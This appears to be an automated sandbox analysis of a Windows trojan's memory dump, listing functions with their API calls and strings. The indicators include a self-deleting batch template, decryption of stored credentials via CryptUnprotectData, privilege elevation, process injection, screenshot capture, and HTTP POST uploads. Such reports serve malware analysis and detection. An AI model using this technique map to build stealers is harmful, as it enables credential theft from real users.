Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF52FF, Relevance: 24.3, APIs: 8, Strings: 4, Instructions: 89

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 00AF530F
GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 00AF532D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00AF5339
memset.MSVCRT ref: 00AF5379
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 00AF53C6
CloseHandle.KERNEL32(?), ref: 00AF53DA
CloseHandle.KERNEL32(?), ref: 00AF53E0
FreeLibrary.KERNEL32 ref: 00AF53F4

Strings

userenv.dll, xrefs: 00AF5304
CreateEnvironmentBlock, xrefs: 00AF5327
DestroyEnvironmentBlock, xrefs: 00AF5333
D, xrefs: 00AF53BA

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B1611F, Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 261

APIs

Part of subcall function 00B0C43C: lstrlenW.KERNEL32 ref: 00B0C443
Part of subcall function 00B0C43C: memcpy.MSVCRT ref: 00B0C4D1

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

getpeername.WS2_32(?,?,?), ref: 00B16361

Part of subcall function 00B1306E: memcmp.MSVCRT ref: 00B13090

lstrcpyW.KERNEL32(?,0:0), ref: 00B163E9

Part of subcall function 00B13C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00B13C98
Part of subcall function 00B13C83: StrCmpIW.SHLWAPI(?,?), ref: 00B13CA2

Part of subcall function 00B12755: EnterCriticalSection.KERNEL32(00B23510,?,00B130AF,?,?,00000000), ref: 00B12765
Part of subcall function 00B12755: LeaveCriticalSection.KERNEL32(00B23510,?,00000000), ref: 00B1278F

WSAAddressToStringW.WS2_32(?,?,00000000), ref: 00B163D5

Strings

mSER, xrefs: 00B16176
hASS, xrefs: 00B1617D
U, xrefs: 00B161F1
lYPE, xrefs: 00B16279
~EAT, xrefs: 00B16280
hASV, xrefs: 00B16287
kTAT, xrefs: 00B162C3
tIST, xrefs: 00B162CA
0, xrefs: 00B163C4
0:0, xrefs: 00B163DF

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF5482, Relevance: 22.5, APIs: 6, Strings: 5, Instructions: 109

APIs

Part of subcall function 00AEE35B: GetTempPathW.KERNEL32(00000104,?), ref: 00AEE376
Part of subcall function 00AEE35B: PathAddBackslashW.SHLWAPI(?), ref: 00AEE3A0
Part of subcall function 00AEE35B: CreateDirectoryW.KERNEL32(?), ref: 00AEE457
Part of subcall function 00AEE35B: SetFileAttributesW.KERNEL32(?), ref: 00AEE468
Part of subcall function 00AEE35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00AEE481
Part of subcall function 00AEE35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00AEE492

CharToOemW.USER32(?,?), ref: 00AF54C8
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00AF54FF

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

CloseHandle.KERNEL32(000000FF), ref: 00AF5527
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 00AF5569
memset.MSVCRT ref: 00AF557E
CloseHandle.KERNEL32(000000FF), ref: 00AF55B9

Part of subcall function 00AEE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00AEE82F
Part of subcall function 00AEE826: DeleteFileW.KERNEL32(?), ref: 00AEE836

Part of subcall function 00AEE348: CloseHandle.KERNEL32 ref: 00AEE354

Strings

.bat, xrefs: 00AF549C
@echo off%sdel /F "%s", xrefs: 00AF54D9
/c "%s", xrefs: 00AF5534
ComSpec, xrefs: 00AF5564
D, xrefs: 00AF559E

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B15C75, Relevance: 22.3, APIs: 6, Strings: 5, Instructions: 60

APIs

LoadLibraryW.KERNEL32(cabinet.dll), ref: 00B15C89

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

GetProcAddress.KERNEL32(?,FCICreate), ref: 00B15CB8
GetProcAddress.KERNEL32(?,FCIAddFile), ref: 00B15CC7
GetProcAddress.KERNEL32(?,FCIFlushCabinet), ref: 00B15CD6
GetProcAddress.KERNEL32(?,FCIDestroy), ref: 00B15CE5

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

FreeLibrary.KERNEL32 ref: 00B15D1A

Strings

cabinet.dll, xrefs: 00B15C84
FCICreate, xrefs: 00B15CB1
FCIAddFile, xrefs: 00B15CBD
FCIFlushCabinet, xrefs: 00B15CCC
FCIDestroy, xrefs: 00B15CDB

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF357D, Relevance: 21.5, APIs: 12, Instructions: 144

APIs

Part of subcall function 00AF6861: memchr.MSVCRT ref: 00AF689D
Part of subcall function 00AF6861: memcmp.MSVCRT ref: 00AF68BC

VirtualProtect.KERNEL32(?,00AF37D4,00000080,?), ref: 00AF35ED
VirtualProtect.KERNEL32(?,00AF37D4,00000000,?), ref: 00AF3756

Part of subcall function 00AF6A7D: memcpy.MSVCRT ref: 00AF6A9C

Part of subcall function 00AF6B09: memcmp.MSVCRT ref: 00AF6B29

GetCurrentThread.KERNEL32 ref: 00AF36AC
GetThreadPriority.KERNEL32 ref: 00AF36B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 00AF36C6
Sleep.KERNEL32(00000000), ref: 00AF36CA
memcpy.MSVCRT ref: 00AF36D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00AF36EA
SetThreadPriority.KERNEL32 ref: 00AF36F2

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

GetTickCount.KERNEL32 ref: 00AF370D
GetTickCount.KERNEL32 ref: 00AF371A
Sleep.KERNEL32(00000000), ref: 00AF3727

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AECECC, Relevance: 21.3, APIs: 14, Instructions: 290

APIs

Sleep.KERNEL32(00003A98), ref: 00AECEE3

Part of subcall function 00AF5AF5: InitializeCriticalSection.KERNEL32 ref: 00AF5AFC

InitializeCriticalSection.KERNEL32(?), ref: 00AECF47
memset.MSVCRT ref: 00AECF5E
InitializeCriticalSection.KERNEL32(?), ref: 00AECF78

Part of subcall function 00AEFBE6: memset.MSVCRT ref: 00AEFBFD
Part of subcall function 00AEFBE6: memset.MSVCRT ref: 00AEFCD4

InitializeCriticalSection.KERNEL32(?), ref: 00AECFD2
memset.MSVCRT ref: 00AECFDD
memset.MSVCRT ref: 00AECFEB

Part of subcall function 00B0FA0A: EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,00AED004,00000000), ref: 00B0FB0C
Part of subcall function 00B0FA0A: LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,00AED004,00000000), ref: 00B0FB4D
Part of subcall function 00B0FA0A: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B0FB5C
Part of subcall function 00B0FA0A: SetEvent.KERNEL32 ref: 00B0FB6C
Part of subcall function 00B0FA0A: GetExitCodeThread.KERNEL32(?,?), ref: 00B0FB80
Part of subcall function 00B0FA0A: CloseHandle.KERNEL32 ref: 00B0FB96

Part of subcall function 00AEBFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00AEC08A
Part of subcall function 00AEBFFE: GetHandleInformation.KERNEL32(?,?), ref: 00AEC09C
Part of subcall function 00AEBFFE: socket.WS2_32(?,00000001,00000006), ref: 00AEC0CF
Part of subcall function 00AEBFFE: socket.WS2_32(?,00000002,00000011), ref: 00AEC0E0
Part of subcall function 00AEBFFE: closesocket.WS2_32(00000002), ref: 00AEC0FF
Part of subcall function 00AEBFFE: closesocket.WS2_32 ref: 00AEC106
Part of subcall function 00AEBFFE: memset.MSVCRT ref: 00AEC1C8
Part of subcall function 00AEBFFE: memcpy.MSVCRT ref: 00AEC3C8

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

WaitForMultipleObjects.KERNEL32(?,?,00000000,0000EA60), ref: 00AED061

Part of subcall function 00AF5B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,00AED091,?,?,00000000,0000EA60,00000000), ref: 00AF5B48
Part of subcall function 00AF5B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 00AF5B6C
Part of subcall function 00AF5B40: CloseHandle.KERNEL32 ref: 00AF5B7C
Part of subcall function 00AF5B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00AED091,?,?,00000000,0000EA60,00000000), ref: 00AF5BAC

Part of subcall function 00AEC41C: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00AEC44D
Part of subcall function 00AEC41C: WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00AEC4DF
Part of subcall function 00AEC41C: SetEvent.KERNEL32 ref: 00AEC532
Part of subcall function 00AEC41C: SetEvent.KERNEL32 ref: 00AEC56B
Part of subcall function 00AEC41C: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00AEC5F0

Part of subcall function 00AF229C: EnterCriticalSection.KERNEL32(?,?,?,?,?,00AED154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 00AF22BD
Part of subcall function 00AF229C: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00AED154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 00AF22D9

Part of subcall function 00AF3172: memset.MSVCRT ref: 00AF328F
Part of subcall function 00AF3172: memcpy.MSVCRT ref: 00AF32A2
Part of subcall function 00AF3172: memcpy.MSVCRT ref: 00AF32B8

Part of subcall function 00B12D0B: accept.WS2_32(?,0000EA60), ref: 00B12D2C
Part of subcall function 00B12D0B: WSAEventSelect.WS2_32(?,00000000,00000000), ref: 00B12D3E
Part of subcall function 00B12D0B: WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00AED163,?), ref: 00B12D6F
Part of subcall function 00B12D0B: shutdown.WS2_32(?,00000002), ref: 00B12D87
Part of subcall function 00B12D0B: closesocket.WS2_32 ref: 00B12D8E
Part of subcall function 00B12D0B: WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00AED163), ref: 00B12D95

Part of subcall function 00AEF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00AEF82D

Part of subcall function 00AEC5FE: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,00AED203,?,?,00000000,?,?,?,?,00000000), ref: 00AEC631
Part of subcall function 00AEC5FE: memcmp.MSVCRT ref: 00AEC67F
Part of subcall function 00AEC5FE: SetEvent.KERNEL32 ref: 00AEC6C0
Part of subcall function 00AEC5FE: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,00AED203,?,?,00000000,?), ref: 00AEC6ED

Part of subcall function 00AF5C67: EnterCriticalSection.KERNEL32(00DB28B4,?,?,00000001,00B04EA8,?,?,00000001), ref: 00AF5C70
Part of subcall function 00AF5C67: LeaveCriticalSection.KERNEL32(00DB28B4,?,00000001,00B04EA8,?,?,00000001), ref: 00AF5C7A
Part of subcall function 00AF5C67: WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00AF5CA0
Part of subcall function 00AF5C67: EnterCriticalSection.KERNEL32(00DB28B4,?,00000001,00B04EA8,?,?,00000001), ref: 00AF5CB8
Part of subcall function 00AF5C67: LeaveCriticalSection.KERNEL32(00DB28B4,?,00000001,00B04EA8,?,?,00000001), ref: 00AF5CC2

CloseHandle.KERNEL32(?), ref: 00AED260
CloseHandle.KERNEL32(?), ref: 00AED26D

Part of subcall function 00B0FE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,00B0FB19,?,77C475F0,7C809F91,?,?,?,?,00AED004,00000000), ref: 00B0FE4D
Part of subcall function 00B0FE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,00B0FB19,?,77C475F0,7C809F91,?,?,?,?,00AED004,00000000), ref: 00B0FE84

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00AED283

Part of subcall function 00AEFCFF: memset.MSVCRT ref: 00AEFD0F

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00AED2A2
CloseHandle.KERNEL32(?), ref: 00AED2AF
DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00AED2B9

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AF5B10: CloseHandle.KERNEL32 ref: 00AF5B20
Part of subcall function 00AF5B10: DeleteCriticalSection.KERNEL32(?,?,00DB28A8,00B04EB9,?,?,00000001), ref: 00AF5B37

Part of subcall function 00AECEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00AECEB9

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF338D, Relevance: 20.3, APIs: 7, Strings: 3, Instructions: 143

APIs

GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 00AF33AB
GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 00AF33B6
GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 00AF33C1

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

lstrcmpiW.KERNEL32(?), ref: 00AF344E
memcpy.MSVCRT ref: 00AF3471

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00AF349C
memcpy.MSVCRT ref: 00AF34CA

Strings

GdipGetImageEncodersSize, xrefs: 00AF339C
GdipGetImageEncoders, xrefs: 00AF33AD
GdipSaveImageToStream, xrefs: 00AF33B8

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0B33E, Relevance: 20.3, APIs: 8, Strings: 2, Instructions: 107

APIs

memcpy.MSVCRT ref: 00B0B364
CreateFileMappingW.KERNEL32(000000FF,?,08000004,00000000,00001000,00000000), ref: 00B0B385
MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00001000), ref: 00B0B39D

Part of subcall function 00B0AF22: UnmapViewOfFile.KERNEL32 ref: 00B0AF2E
Part of subcall function 00B0AF22: CloseHandle.KERNEL32 ref: 00B0AF3F

memset.MSVCRT ref: 00B0B3F2
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00B0B42B

Part of subcall function 00B0AF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,00B1F128), ref: 00B0AF7C
Part of subcall function 00B0AF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 00B0AF9C
Part of subcall function 00B0AF4A: memset.MSVCRT ref: 00B0B039
Part of subcall function 00B0AF4A: memcpy.MSVCRT ref: 00B0B04B

ResumeThread.KERNEL32(?), ref: 00B0B44E
CloseHandle.KERNEL32(?), ref: 00B0B465
CloseHandle.KERNEL32(?), ref: 00B0B46B

Strings

-m%p, xrefs: 00B0B3CD
D, xrefs: 00B0B423

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF50C0, Relevance: 18.5, APIs: 8, Strings: 1, Instructions: 60

APIs

GetCurrentThread.KERNEL32 ref: 00AF50D4
OpenThreadToken.ADVAPI32 ref: 00AF50DB
GetCurrentProcess.KERNEL32 ref: 00AF50EB
OpenProcessToken.ADVAPI32 ref: 00AF50F2
LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00AF5113
AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00AF5128
GetLastError.KERNEL32 ref: 00AF5132
CloseHandle.KERNEL32(00000001), ref: 00AF5143

Strings

SeTcbPrivilege, xrefs: 00AF5106

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B00A9A, Relevance: 18.4, APIs: 8, Strings: 1, Instructions: 182

APIs

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00B00AD8
PathRemoveFileSpecW.SHLWAPI(?), ref: 00B00B26

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

FindFirstFileW.KERNEL32(?,?), ref: 00B00B93
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00B00BEA
FindClose.KERNEL32 ref: 00B00CF3

Part of subcall function 00AEE4C3: GetFileSizeEx.KERNEL32(?,?), ref: 00AEE4CE

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

SetLastError.KERNEL32(00000057,?), ref: 00B00C5B

Part of subcall function 00AEE543: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00AEE555

CloseHandle.KERNEL32 ref: 00B00C95

Part of subcall function 00AEE348: CloseHandle.KERNEL32 ref: 00AEE354

FindNextFileW.KERNEL32(?,?), ref: 00B00CC9

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AEE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00AEE82F
Part of subcall function 00AEE826: DeleteFileW.KERNEL32(?), ref: 00AEE836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00B00AFA

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEADFB, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184

APIs

GetLogicalDrives.KERNEL32 ref: 00AEAE0F

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

SHGetFolderPathW.SHELL32(00000000,00006024,00000000,00000000,?), ref: 00AEAE54
PathGetDriveNumberW.SHLWAPI(?), ref: 00AEAE66
lstrcpyW.KERNEL32(?,00AE75B0), ref: 00AEAE7A
GetDriveTypeW.KERNEL32(?), ref: 00AEAEE3
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000105), ref: 00AEAF44
CharUpperW.USER32(?), ref: 00AEAF60
lstrcmpW.KERNEL32(?), ref: 00AEAF83
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?), ref: 00AEAFC1

Strings

#, xrefs: 00AEAE9E

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFF23B, Relevance: 16.5, APIs: 9, Instructions: 176

APIs

lstrlenW.KERNEL32 ref: 00AFF31C

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 00AFF389

Part of subcall function 00B13D5A: memcpy.MSVCRT ref: 00B13D94

LocalFree.KERNEL32(?), ref: 00AFF3A7
lstrlenW.KERNEL32(?), ref: 00AFF410

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

#6.OLEAUT32 ref: 00AFF432
#6.OLEAUT32(?), ref: 00AFF438
#6.OLEAUT32 ref: 00AFF43B
#6.OLEAUT32(?), ref: 00AFF441
#6.OLEAUT32 ref: 00AFF444

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B008C0, Relevance: 16.3, APIs: 7, Strings: 1, Instructions: 146

APIs

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

Part of subcall function 00AF6A7D: memcpy.MSVCRT ref: 00AF6A9C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00B00934
PathRemoveFileSpecW.SHLWAPI(?), ref: 00B00982
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B009F8
GetLastError.KERNEL32(?,?,?,00000000,3D94878D), ref: 00B00A05
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00B00A2F
FlushFileBuffers.KERNEL32 ref: 00B00A49
CloseHandle.KERNEL32 ref: 00B00A50

Part of subcall function 00AEE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00AEE82F
Part of subcall function 00AEE826: DeleteFileW.KERNEL32(?), ref: 00AEE836

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00B00956

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF8F66, Relevance: 16.3, APIs: 3, Strings: 5, Instructions: 75

APIs

Part of subcall function 00AF8E45: InternetCloseHandle.WININET ref: 00AF8E57

HttpOpenRequestA.WININET(?,?,?,HTTP/1.1,00000000,00AE7BD8,?,00000000), ref: 00AF8FA7
HttpAddRequestHeadersA.WININET(?,Connection: Close,00000013,A0000000), ref: 00AF8FCA
HttpSendRequestExA.WININET(?,?,00000000,00000000,00000000), ref: 00AF900C

Strings

HTTP/1.1, xrefs: 00AF8F8E
GET, xrefs: 00AF8F96
POST, xrefs: 00AF8F9B
Connection: Close, xrefs: 00AF8FC4
(, xrefs: 00AF9005

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B14181, Relevance: 16.2, APIs: 9, Instructions: 128

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B141A1
Process32FirstW.KERNEL32(?,?), ref: 00B141C6

Part of subcall function 00B0BE5A: CreateMutexW.KERNEL32(00B22974,00000001,?), ref: 00B0BEA0
Part of subcall function 00B0BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00B0BEAC
Part of subcall function 00B0BE5A: CloseHandle.KERNEL32 ref: 00B0BEBA

OpenProcess.KERNEL32(00000400,00000000,?), ref: 00B1421D
CloseHandle.KERNEL32(?), ref: 00B142E7

Part of subcall function 00AF500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00AF5020
Part of subcall function 00AF500E: GetTokenInformation.ADVAPI32(?,0000000C,00B22968,00000004,?), ref: 00AF5048
Part of subcall function 00AF500E: CloseHandle.KERNEL32(?), ref: 00AF505E

CloseHandle.KERNEL32 ref: 00B1423B
GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00B14257
memcmp.MSVCRT ref: 00B1426F

Part of subcall function 00AF6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?,?), ref: 00AF6A43
Part of subcall function 00AF6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?), ref: 00AF6A56

Part of subcall function 00B140CB: OpenProcess.KERNEL32(0000047A,00000000,?), ref: 00B140DC
Part of subcall function 00B140CB: CreateThread.KERNEL32(00000000,00000000,00B140AB,?), ref: 00B14132
Part of subcall function 00B140CB: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B1413D
Part of subcall function 00B140CB: CloseHandle.KERNEL32 ref: 00B14144
Part of subcall function 00B140CB: WaitForSingleObject.KERNEL32(?,00002710), ref: 00B14154
Part of subcall function 00B140CB: CloseHandle.KERNEL32(?), ref: 00B1415B
Part of subcall function 00B140CB: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00B1416C
Part of subcall function 00B140CB: CloseHandle.KERNEL32 ref: 00B14173

Process32NextW.KERNEL32(?,?), ref: 00B142F3
CloseHandle.KERNEL32 ref: 00B14306

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEB74D, Relevance: 16.0, APIs: 9, Instructions: 112

APIs

GetProcAddress.KERNEL32(?,?), ref: 00AEB76F
GetProcAddress.KERNEL32(?,?), ref: 00AEB791
GetProcAddress.KERNEL32(?,?), ref: 00AEB7AC
GetProcAddress.KERNEL32(?,?), ref: 00AEB7C7
GetProcAddress.KERNEL32(?,?), ref: 00AEB7E2
GetProcAddress.KERNEL32(?,?), ref: 00AEB7FD
GetProcAddress.KERNEL32(?,?), ref: 00AEB81C
GetProcAddress.KERNEL32(?,?), ref: 00AEB83B
GetProcAddress.KERNEL32(?,?), ref: 00AEB85A

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0B0C1, Relevance: 16.0, APIs: 9, Instructions: 103

APIs

GetCommandLineW.KERNEL32 ref: 00B0B0DB
CommandLineToArgvW.SHELL32 ref: 00B0B0E2
StrCmpNW.SHLWAPI(?,00AE7F1C,00000002), ref: 00B0B108
LocalFree.KERNEL32 ref: 00B0B134

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 00B0B171
memcpy.MSVCRT ref: 00B0B184

Part of subcall function 00B0F8BA: memcpy.MSVCRT ref: 00B0F8E7

UnmapViewOfFile.KERNEL32 ref: 00B0B1BD
CloseHandle.KERNEL32 ref: 00B0B1F9

Part of subcall function 00B0B562: memset.MSVCRT ref: 00B0B587
Part of subcall function 00B0B562: memcpy.MSVCRT ref: 00B0B5E7
Part of subcall function 00B0B562: memcpy.MSVCRT ref: 00B0B5FF
Part of subcall function 00B0B562: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00B0B66A
Part of subcall function 00B0B562: memcpy.MSVCRT ref: 00B0B6A8

memcpy.MSVCRT ref: 00B0B1E0

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF9152, Relevance: 16.0, APIs: 9, Instructions: 98

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00AF9173

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

CloseHandle.KERNEL32 ref: 00AF9198
SetLastError.KERNEL32(00000008,?,?,?,?,00B00646,?,?,?,?), ref: 00AF91A0
WaitForSingleObject.KERNEL32(?,00000000), ref: 00AF91BD
InternetReadFile.WININET(?,?,00001000,?), ref: 00AF91DB
